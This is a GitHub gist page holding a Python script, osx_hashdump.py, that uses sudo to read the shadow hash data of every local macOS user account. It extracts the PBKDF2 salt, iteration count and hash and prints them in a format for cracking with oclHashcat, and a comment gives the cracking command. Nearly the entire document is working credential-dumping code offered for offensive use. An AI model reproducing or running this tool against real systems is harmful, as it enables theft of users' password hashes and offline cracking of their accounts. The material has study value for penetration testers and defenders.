Created
January 12, 2016 04:30
-
-
Save HarmJ0y/55e633cc977d6568e843 to your computer and use it in GitHub Desktop.
osx_hashdump.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# extracts OSX user hashes and outputs a format crackable with oclHashcat | |
# adapted from http://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored | |
# and https://web.archive.org/web/20140703020831/http://www.michaelfairley.co/blog/2014/05/18/how-to-extract-os-x-mavericks-password-hash-for-cracking-with-hashcat/ | |
# | |
# automation of approach by @harmj0y | |
# | |
# sudo ./osx_hashdump.py | |
# ./oclHashcat64.bin -m 7100 hash.txt wordlist.txt | |
import os, base64 | |
from xml.etree import ElementTree | |
def getUserHash(userName): | |
try: | |
raw = os.popen('sudo defaults read /var/db/dslocal/nodes/Default/users/%s.plist ShadowHashData|tr -dc 0-9a-f|xxd -r -p|plutil -convert xml1 - -o - 2> /dev/null' %(userName)).read() | |
if len(raw) > 100: | |
root = ElementTree.fromstring(raw) | |
children = root[0][1].getchildren() | |
entropy64 = ''.join(children[1].text.split()) | |
iterations = children[3].text | |
salt64 = ''.join(children[5].text.split()) | |
entropyRaw = base64.b64decode(entropy64) | |
entropyHex = entropyRaw.encode("hex") | |
saltRaw = base64.b64decode(salt64) | |
saltHex = saltRaw.encode("hex") | |
return (userName, "ml$%s$%s$%s" %(iterations, saltHex, entropyHex)) | |
except Exception as e: | |
print "getUserHash() exception: %s" %(e) | |
pass | |
userNames = [ plist.split(".")[0] for plist in os.listdir('/var/db/dslocal/nodes/Default/users/') if not plist.startswith('_')] | |
userHashes = [] | |
for userName in userNames: | |
userHash = getUserHash(userName) | |
if(userHash): | |
userHashes.append(getUserHash(userName)) | |
print userHashes |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment